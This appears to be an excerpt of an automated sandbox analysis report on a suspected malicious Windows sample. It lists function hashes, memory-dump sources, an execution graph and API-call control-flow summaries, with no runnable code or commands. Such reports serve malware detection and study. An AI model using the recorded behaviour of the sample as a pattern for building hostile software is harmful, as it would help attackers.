                                • Instruction ID: 8954c73e0b067995319f0d7062776d274243ef26e862ced3d055370ec16ce057
                                • Opcode Fuzzy Hash: 27103e2b37475d190837f9963b66716ddddbe95802a921da08504c0a13a21b79
                                • Instruction Fuzzy Hash: CE018131F002140BDB64A56D9455B6FB7DAEBC9B20F208839E60ED7754EE65DC024395
                                Function 06F4F2C0 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 339ddb1e95860b76e1085eb70c3dd971e444dc941ba3a60519cd8d1fb031125a
                                • Instruction ID: 2a04549e1fe2fe452e4355575fa38197747a8bb1b71e13a9adb822a58272c5a0
                                • Opcode Fuzzy Hash: 339ddb1e95860b76e1085eb70c3dd971e444dc941ba3a60519cd8d1fb031125a
                                • Instruction Fuzzy Hash: 85018135F111140BDB64E56D9491B3F6BDADBC9720F108839EA0EC7340DE25EC034796
                                Function 07630C34 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 050416e735a62d99471d3b86bfc75fb691bcdd54e98364dededc0c9310bef346
                                • Instruction ID: a4f2be6b65575eeaf8e9646073edadfc0f42ba549f23784bfba24828c57f4b42
                                • Opcode Fuzzy Hash: 050416e735a62d99471d3b86bfc75fb691bcdd54e98364dededc0c9310bef346
                                • Instruction Fuzzy Hash: F9019EB8210B08DBD3289B29C5846227BF9FB8B752F08890DE40782600CB75EC02CB50
                                Function 06F4A428 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6c186ee4f4bd827b462c1de48f174a70713280200d16032f3c3e864411ad6ab
                                • Instruction ID: 15398ef9c048efac94135100dd1ba6f6137a00f86ab72abe9745ccc24d2c5c45
                                • Opcode Fuzzy Hash: f6c186ee4f4bd827b462c1de48f174a70713280200d16032f3c3e864411ad6ab
                                • Instruction Fuzzy Hash: 6D016D34F102144BDB60EA7CD454B2F77DAEB8D360F208838E60AC7768EE25EC024791
                                Function 06F483E0 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e45d045f374fe4805f65a894271f581fc5e168cc38086b7c3602cc6e0fec4a6b
                                • Instruction ID: 87416fb6c1bc7dec995009053c02ddf50d2d8d558c50f2f2ae30871e807e970d
                                • Opcode Fuzzy Hash: e45d045f374fe4805f65a894271f581fc5e168cc38086b7c3602cc6e0fec4a6b
                                • Instruction Fuzzy Hash: E5F08136E00314CFDF64AA54E5806B97B6CF7453D0F104465DA15D7A61C635ED05CB91
                                Function 0763193A Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7dbe9b1c67c032c259de5c99f79c4c36384e20df7ecc24a9830bbcf275c2a52b
                                • Instruction ID: 682166bb5269fd507888773e24529c0aa039877d53d2f82740741da11a6a794c
                                • Opcode Fuzzy Hash: 7dbe9b1c67c032c259de5c99f79c4c36384e20df7ecc24a9830bbcf275c2a52b
                                • Instruction Fuzzy Hash: 27F0F0B1D08304AFCB34CFB8D84049AFFF9EF0A21070485AAE491C3200D730E918CBA1
                                Function 07631988 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 87e3fd2f0c4ca2ea651550f192e508051bfb8a4b02ba848b7f057c726c9fa6e0
                                • Instruction ID: 33553d5a500df2a957b8430cee0da303bdb8404efbc204ff25f1ddcf7c984747
                                • Opcode Fuzzy Hash: 87e3fd2f0c4ca2ea651550f192e508051bfb8a4b02ba848b7f057c726c9fa6e0
                                • Instruction Fuzzy Hash: A7F0493610838ADFCB02CF24D885D947BF6FF0631432984DAE0588B663D736E866DB61
                                Function 06F46580 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 64bfef96cc1e34939510de327ef58d966304b9dc3a96093a3b56c39d71052381
                                • Instruction ID: 16a2babf5670097f84052a3b401b56e44e581b0f0810341aa84e445c25bc6df7
                                • Opcode Fuzzy Hash: 64bfef96cc1e34939510de327ef58d966304b9dc3a96093a3b56c39d71052381
                                • Instruction Fuzzy Hash: 16E0D870E152486FDF60EEB8CD19B5B7FAD9B43214F1048E5E804C754AE176CD42C791
                                Function 07631948 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5669996b9e1edc291239b52b2e07b8019aa5a71ec8b2530eda36ad5f8f77f6ef
                                • Instruction ID: 7171c43e1160bab8093e7a5ac1aec86c0f9aea4bbcd283d490c1f0483e4d4b77
                                • Opcode Fuzzy Hash: 5669996b9e1edc291239b52b2e07b8019aa5a71ec8b2530eda36ad5f8f77f6ef
                                • Instruction Fuzzy Hash: 37F030B5E00718AF8B34DFB9D80049AFBF9EF49610B00856AE456D3600D731E914CB90
                                Function 06F44B61 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9abb8a3cb9058a72a089f1ce726e12d4232abfaaa869381f4186cf828d295f87
                                • Instruction ID: 2555ebc75672d5510d44da89ed90c22f1bb5287b76609747332aa78923f4193c
                                • Opcode Fuzzy Hash: 9abb8a3cb9058a72a089f1ce726e12d4232abfaaa869381f4186cf828d295f87
                                • Instruction Fuzzy Hash: DBF0B231A54229EBDB14EB94E899BAEBBB2FF48701F200119E402A7684CB705C42CBC0
                                Function 076316C0 Relevance: .0, Instructions: 17COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 66ef4c187bc20c9ce2d941786c2b775694505bc3c2846d45add3ccb049468d8c
                                • Instruction ID: 4d9e09aa7fc7d488886a1a0e26e700f66b02e5dbb14f7dbef62e21f2ed542555
                                • Opcode Fuzzy Hash: 66ef4c187bc20c9ce2d941786c2b775694505bc3c2846d45add3ccb049468d8c
                                • Instruction Fuzzy Hash: D3D0A76262956457D604B1E8A4113D827594B46210F00006B811DC7142CD5DCC0287EA
                                Function 07631B12 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d3e1d1e9adf0b99a8fbd3fbed0c1d3b4f95edc55d99ec16c1de42d24af50174
                                • Instruction ID: 503aa675cb092f2640059e0426abbdbc4ac9bfe645faa3d9401e0f6e24efb1f0
                                • Opcode Fuzzy Hash: 7d3e1d1e9adf0b99a8fbd3fbed0c1d3b4f95edc55d99ec16c1de42d24af50174
                                • Instruction Fuzzy Hash: 20C08C733151281BC614B2ECF061AEF7B9E8B89A60F14402BE21D87B408FD59C8142FA
                                Function 07631B18 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0fad5c1dc58d232c89b39453549466d29066cc2fdf78ed34e57598126885bde
                                • Instruction ID: df581ad7559efb4615c0f0dd80d1ccdfc5c1a7cea4095947f9770adb050c2b15
                                • Opcode Fuzzy Hash: b0fad5c1dc58d232c89b39453549466d29066cc2fdf78ed34e57598126885bde
                                • Instruction Fuzzy Hash: 29B0926232523C13DA1831DDA420AAF769E8B89E60F54406BA60E977818ED69C4102EE
                                Function 076316D0 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 568599575f69d59b74c89ca7f4d713422d1c43ba98925a3e63c09c2bcdcf6bca
                                • Instruction ID: d7b4caed4ed2c4f465b8bf31de806207a45258c22d436d34642269c8da600f06
                                • Opcode Fuzzy Hash: 568599575f69d59b74c89ca7f4d713422d1c43ba98925a3e63c09c2bcdcf6bca
                                • Instruction Fuzzy Hash: C0B09B6132523813D90471DD64206DD769E4789A60F40406B960D877414DD59C4146EE
                                Function 07630253 Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bfeec3af82b1912f6daebc48f66f5fdcfe05d52df61e5aab298e7511345290d
                                • Instruction ID: 39ef9d12ced2df2367c660f14d6b7f1d6f9936a9035d2fdb7338bb4cbeeddb3b
                                • Opcode Fuzzy Hash: 0bfeec3af82b1912f6daebc48f66f5fdcfe05d52df61e5aab298e7511345290d
                                • Instruction Fuzzy Hash: 8AD0C9B084421ACFEF659FC0C858BEEBB71BB08715F000419D012A6194CBB9058ACF51

                                Execution Graph

                                Execution Coverage:6.3%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:106
                                Total number of Limit Nodes:2
                                execution_graph 40838 5864373 40839 586438a 40838->40839 40840 586437a 40838->40840 40843 5864390 40840->40843 40847 58643a0 40840->40847 40844 58643a0 40843->40844 40845 586443a CallWindowProcW 40844->40845 40846 58643e9 40844->40846 40845->40846 40846->40839 40848 58643a5 40847->40848 40849 586443a CallWindowProcW 40848->40849 40850 58643e9 40848->40850 40849->40850 40850->40839 40817 170d4b8 40818 170d4b9 40817->40818 40822 170d698 40818->40822 40826 170d688 40818->40826 40819 170d5eb 40823 170d69d 40822->40823 40830 170b750 40823->40830 40827 170d698 40826->40827 40828 170b750 DuplicateHandle 40827->40828 40829 170d6c6 40828->40829 40829->40819 40831 170d700 DuplicateHandle 40830->40831 40833 170d6c6 40831->40833 40833->40819 40834 5ecfbc0 40835 5ecfc00 ResumeThread 40834->40835 40837 5ecfc31 40835->40837 40851 58682f8 40852 5868325 40851->40852 40867 5867d4c 40852->40867 40854 58683b9 40855 5867d4c GetModuleHandleW 40854->40855 40856 58683eb 40855->40856 40873 5867d5c 40856->40873 40858 586841d 40859 5867d4c GetModuleHandleW 40858->40859 40860 5868681 40859->40860 40861 5867d5c GetModuleHandleW 40860->40861 40862 58686b3 40861->40862 40863 5867d4c GetModuleHandleW 40862->40863 40864 586882e 40863->40864 40865 5867d4c GetModuleHandleW 40864->40865 40866 5868860 40865->40866 40868 5867d57 40867->40868 40869 586a905 40868->40869 40878 1707100 40868->40878 40882 17076f7 40868->40882 40886 17076e0 40868->40886 40869->40854 40874 5867d67 40873->40874 40876 1707130 GetModuleHandleW 40874->40876 40941 170866b 40874->40941 40875 586b034 40875->40858 40876->40875 40879 170710b 40878->40879 40891 1707130 40879->40891 40881 17077ad 40881->40869 40883 1707702 40882->40883 40884 1707130 GetModuleHandleW 40883->40884 40885 17077ad 40884->40885 40885->40869 40888 17076e3 40886->40888 40887 17076eb 40887->40869 40888->40887 40889 1707130 GetModuleHandleW 40888->40889 40890 17077ad 40889->40890 40890->40869 40892 170713b 40891->40892 40894 170892b 40892->40894 40898 170afe3 40892->40898 40893 1708969 40893->40881 40894->40893 40902 170d0d0 40894->40902 40907 170d0c0 40894->40907 40912 170b010 40898->40912 40916 170b000 40898->40916 40899 170afee 40899->40894 40903 170d0f1 40902->40903 40904 170d115 40903->40904 40925 170d3a0 40903->40925 40929 170d390 40903->40929 40904->40893 40908 170d0c8 40907->40908 40909 170d115 40908->40909 40910 170d3a0 GetModuleHandleW 40908->40910 40911 170d390 GetModuleHandleW 40908->40911 40909->40893 40910->40909 40911->40909 40913 170b011 40912->40913 40920 170b0f8 40913->40920 40914 170b01f 40914->40899 40917 170b004 40916->40917 40919 170b0f8 GetModuleHandleW 40917->40919 40918 170b01f 40918->40899 40919->40918 40921 170b0fc 40920->40921 40922 170b13c 40921->40922 40923 170b340 GetModuleHandleW 40921->40923 40922->40914 40924 170b36d 40923->40924 40924->40914 40926 170d3ad 40925->40926 40927 170d3e7 40926->40927 40933 170b688 40926->40933 40927->40904 40930 170d3ad 40929->40930 40931 170d3e7 40930->40931 40932 170b688 GetModuleHandleW 40930->40932 40931->40904 40932->40931 40934 170b68d 40933->40934 40936 170e100 40934->40936 40937 170dcc0 40934->40937 40936->40936 40938 170dccb 40937->40938 40939 1707130 GetModuleHandleW 40938->40939 40940 170e16f 40939->40940 40940->40936 40942 1708678 40941->40942 40944 170892b 40942->40944 40947 170afe3 GetModuleHandleW 40942->40947 40943 1708969 40943->40875 40944->40943 40945 170d0d0 GetModuleHandleW 40944->40945 40946 170d0c0 GetModuleHandleW 40944->40946 40945->40943 40946->40943 40947->40944

                                Executed Functions

                                Function 0170B0F8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1104 170b0f8-170b0fa 1105 170b101-170b102 1104->1105 1106 170b0fc-170b100 1104->1106 1107 170b104-170b106 1105->1107 1108 170b109-170b117 1105->1108 1106->1105 1107->1108 1109 170b108 1107->1109 1110 170b143-170b147 1108->1110 1111 170b119-170b126 call 170a48c 1108->1111 1109->1108 1112 170b149-170b153 1110->1112 1113 170b15b-170b19c 1110->1113 1116 170b128 1111->1116 1117 170b13c 1111->1117 1112->1113 1120 170b1a9-170b1b7 1113->1120 1121 170b19e-170b1a6 1113->1121 1166 170b12e call 170b7a0 1116->1166 1167 170b12e call 170b78f 1116->1167 1117->1110 1123 170b1b9-170b1be 1120->1123 1124 170b1db-170b1dd 1120->1124 1121->1120 1122 170b134-170b136 1122->1117 1127 170b278-170b2f2 1122->1127 1125 170b1c0-170b1c7 call 170a498 1123->1125 1126 170b1c9 1123->1126 1128 170b1e0-170b1e7 1124->1128 1130 170b1cb-170b1d9 1125->1130 1126->1130 1159 170b2f4-170b2f6 1127->1159 1160 170b2f9-170b338 1127->1160 1131 170b1f4-170b1fb 1128->1131 1132 170b1e9-170b1f1 1128->1132 1130->1128 1134 170b208-170b211 call 170a4a8 1131->1134 1135 170b1fd-170b205 1131->1135 1132->1131 1140 170b213-170b21b 1134->1140 1141 170b21e-170b223 1134->1141 1135->1134 1140->1141 1143 170b241-170b245 1141->1143 1144 170b225-170b22c 1141->1144 1168 170b248 call 170baa0 1143->1168 1169 170b248 call 170ba71 1143->1169 1144->1143 1145 170b22e-170b23e call 170a4b8 call 170a4c8 1144->1145 1145->1143 1148 170b24b-170b24e 1150 170b250-170b26e 1148->1150 1151 170b271-170b277 1148->1151 1150->1151 1159->1160 1161 170b340-170b36b GetModuleHandleW 1160->1161 1162 170b33a-170b33d 1160->1162 1163 170b374-170b388 1161->1163 1164 170b36d-170b373 1161->1164 1162->1161 1164->1163 1166->1122 1167->1122 1168->1148 1169->1148
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05740bf21f0e323a3ada6793dd3c33124f7a3ff117ded377f56c255ecea786ea
                                • Instruction ID: 280f3eb50bd7b634dd4b706fa15fa0988266c21892bf5998188101a6dfd9d4b0
                                • Opcode Fuzzy Hash: 05740bf21f0e323a3ada6793dd3c33124f7a3ff117ded377f56c255ecea786ea
                                • Instruction Fuzzy Hash: 45814574A00B05CFE726DF29D44875AFBF1FF88200F108929D48AD7A91D775E945CB91
                                Function 0170590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1170 170590c-170590e 1171 1705910-1705912 1170->1171 1172 1705915-1705916 1170->1172 1173 1705914 1171->1173 1174 1705919-170591c 1171->1174 1175 1705918 1172->1175 1176 170591d-17059d9 CreateActCtxA 1172->1176 1173->1172 1174->1176 1175->1174 1178 17059e2-1705a3c 1176->1178 1179 17059db-17059e1 1176->1179 1186 1705a4b-1705a4f 1178->1186 1187 1705a3e-1705a41 1178->1187 1179->1178 1188 1705a60 1186->1188 1189 1705a51-1705a5d 1186->1189 1187->1186 1191 1705a61 1188->1191 1189->1188 1191->1191
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017059C9
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 37f6a7c317b64b4e4dbcee6b2dd59ea9809ca48ebb883ced2ba71b44712299a2
                                • Instruction ID: 3bd752761a35a534c3a74db51c3f68f759b4ad8519126745c8776ec11e7fe64e
                                • Opcode Fuzzy Hash: 37f6a7c317b64b4e4dbcee6b2dd59ea9809ca48ebb883ced2ba71b44712299a2
                                • Instruction Fuzzy Hash: 1941D0B0C00719CFDB25CFAAC88479EFBF5AB89714F20806AD408AB291DB756946CF50
                                Function 01704514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1192 1704514-17059d9 CreateActCtxA 1197 17059e2-1705a3c 1192->1197 1198 17059db-17059e1 1192->1198 1205 1705a4b-1705a4f 1197->1205 1206 1705a3e-1705a41 1197->1206 1198->1197 1207 1705a60 1205->1207 1208 1705a51-1705a5d 1205->1208 1206->1205 1210 1705a61 1207->1210 1208->1207 1210->1210
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017059C9
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b15026c9199b5ace4daff2f923342e6b2d1edfc67c65485713e242664b710320
                                • Instruction ID: 45bc10db409453fcc3dc4e9f6463532b146479ea665b4f388a80d7b2dbaae483
                                • Opcode Fuzzy Hash: b15026c9199b5ace4daff2f923342e6b2d1edfc67c65485713e242664b710320
                                • Instruction Fuzzy Hash: 6141B2B0C00719CBDB25CFA9C88479EFBF5BF49704F20846AD508AB291DB756945CF50
                                Function 058643A0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1211 58643a0-58643dc 1213 58643e2-58643e7 1211->1213 1214 586448c-58644ac 1211->1214 1215 586443a-5864472 CallWindowProcW 1213->1215 1216 58643e9-5864420 1213->1216 1220 58644af-58644bc 1214->1220 1218 5864474-586447a 1215->1218 1219 586447b-586448a 1215->1219 1223 5864422-5864428 1216->1223 1224 5864429-5864438 1216->1224 1218->1219 1219->1220 1223->1224 1224->1220
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05864461
                                Memory Dump Source
                                • Source File: 00000010.00000002.1559928013.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_5860000_sgxIb.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 60a61f635cf03a81ae88239955942b3d79df659b9ec9f426d9be4cc7c918e67c
                                • Instruction ID: 4dcfba6466753e07756058b2613c3ed65c86eec3b6574589ee8eaf7fe915869b
                                • Opcode Fuzzy Hash: 60a61f635cf03a81ae88239955942b3d79df659b9ec9f426d9be4cc7c918e67c
                                • Instruction Fuzzy Hash: B841F7B49003098FDB14CF99C489AAEBBF6FB88314F24C459D919AB361D774A845CBA0
                                Function 0170B750 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1226 170b750-170d794 DuplicateHandle 1229 170d796-170d79c 1226->1229 1230 170d79d-170d7ba 1226->1230 1229->1230
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0170D6C6,?,?,?,?,?), ref: 0170D787
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: b322540bb28ff9513f16100ef41133c2db8cda1d69019279ef310cff22fed805
                                • Instruction ID: 15eda062edbc6ae2150801af4351604be22e9cc27edeee70197c41360c560a86
                                • Opcode Fuzzy Hash: b322540bb28ff9513f16100ef41133c2db8cda1d69019279ef310cff22fed805
                                • Instruction Fuzzy Hash: 7421E5B5900349DFDB10CFAAD884ADEFBF4EB48310F14846AE914A7350D374A950CFA4
                                Function 0170D6F9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1233 170d6f9-170d6fa 1234 170d701-170d794 DuplicateHandle 1233->1234 1235 170d6fc-170d6ff 1233->1235 1236 170d796-170d79c 1234->1236 1237 170d79d-170d7ba 1234->1237 1235->1234 1236->1237
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0170D6C6,?,?,?,?,?), ref: 0170D787
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 28812a25ce7cbd754fe6ac27b549715ef61faf8d932ad962feb3e2a7e4901455
                                • Instruction ID: 735fc12332ba3e15bf7eeac2a68dcd25377b5f5519f75f7eb6427c0681fcae6a
                                • Opcode Fuzzy Hash: 28812a25ce7cbd754fe6ac27b549715ef61faf8d932ad962feb3e2a7e4901455
                                • Instruction Fuzzy Hash: B621F4B5900349DFDB10CFAAD584ADEFBF4EB48310F14841AE958A3350D374A940CFA4
                                Function 05ECFBC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1240 5ecfbc0-5ecfc2f ResumeThread 1243 5ecfc38-5ecfc5d 1240->1243 1244 5ecfc31-5ecfc37 1240->1244 1244->1243
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.1560912273.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_5ec0000_sgxIb.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 2cbf9e3347729e7c87e605e09e456e9c1704a2928e6cd49cef3cec5520e638d1
                                • Instruction ID: 4eefa74cc7e7fa223e77d4924a55f4ae6fac3335f00311f9c9e61eb48e346fba
                                • Opcode Fuzzy Hash: 2cbf9e3347729e7c87e605e09e456e9c1704a2928e6cd49cef3cec5520e638d1
                                • Instruction Fuzzy Hash: 681128B19003498BDB10DFAAC4457DEFBF5EB88314F148419D559A7240C779A545CBA4
                                Function 0170B2F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1248 170b2f8-170b338 1250 170b340-170b36b GetModuleHandleW 1248->1250 1251 170b33a-170b33d 1248->1251 1252 170b374-170b388 1250->1252 1253 170b36d-170b373 1250->1253 1251->1250 1253->1252
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0170B35E
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: b6b3d2db1a48419aab4b36597eb6a2ed62fcc357faaaba96f2febf0fde8d91eb
                                • Instruction ID: 59ad5f77da83eff7f841a5782137d1d6101a333c148bcb460e3da330785c08ed
                                • Opcode Fuzzy Hash: b6b3d2db1a48419aab4b36597eb6a2ed62fcc357faaaba96f2febf0fde8d91eb
                                • Instruction Fuzzy Hash: E4110FB5C00349CFDB14CF9AC444A9EFBF4EB88210F20842AD919A7250C379A645CFA5
                                Function 013ED01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 87c4986eee9d23f9e6755197b15d5b310e47027e9b7f216978da2085db53160e
                                • Instruction ID: 03ace8be42ca9f6943b510bda82ed8933a6b2e251a65a775d1e35d532cb9a473
                                • Opcode Fuzzy Hash: 87c4986eee9d23f9e6755197b15d5b310e47027e9b7f216978da2085db53160e
                                • Instruction Fuzzy Hash: C221D071604344DFDB15DF54D9C8B26BFA5FB84218F28C569D80A4B686C336D847CA62
                                Function 013ED1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
